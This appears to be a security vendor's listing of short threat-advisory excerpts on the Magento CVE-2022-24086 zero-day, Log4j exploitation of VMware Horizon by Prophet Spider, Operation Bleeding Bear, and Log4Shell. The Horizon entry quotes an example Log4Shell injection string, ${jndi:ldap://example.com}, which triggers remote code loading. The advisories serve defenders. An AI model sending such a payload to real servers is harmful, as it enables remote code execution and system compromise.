Severity: Critical INTRODUCTION Adobe has addressed critical Magento Zero-Day Vulnerability (CVE-2022-24086) that is under active exploitation by threat actors. The security flaw impacts Adobe Commerce and Magento Open Source products. Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code and may result in the complete compromise of a vulnerable system. The […]
Severity: High Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. Attack Chain:• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.• The attack exploits the Log4Shell vulnerability […]
The threat campaign is referred to as Operation Bleeding Bear. The attacks are currently limited to Ukrainian government agencies and businesses; however, the attack seems to have evolved and sophisticated over time, targeting almost all countries. The threat poses a risk to any government agency, non-profit or enterprise system. The malware campaign has been mapped […]
INTRODUCTION Log4Shell vulnerability (CVE-2021-44228) impacts multiple versions of awidely distributed Java software component, Apache Log4j 2. The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables and allows a remote attacker to execute arbitrary code on the target system. Apache Log4j2 <2.15, JNDI enables attackers to call external java […]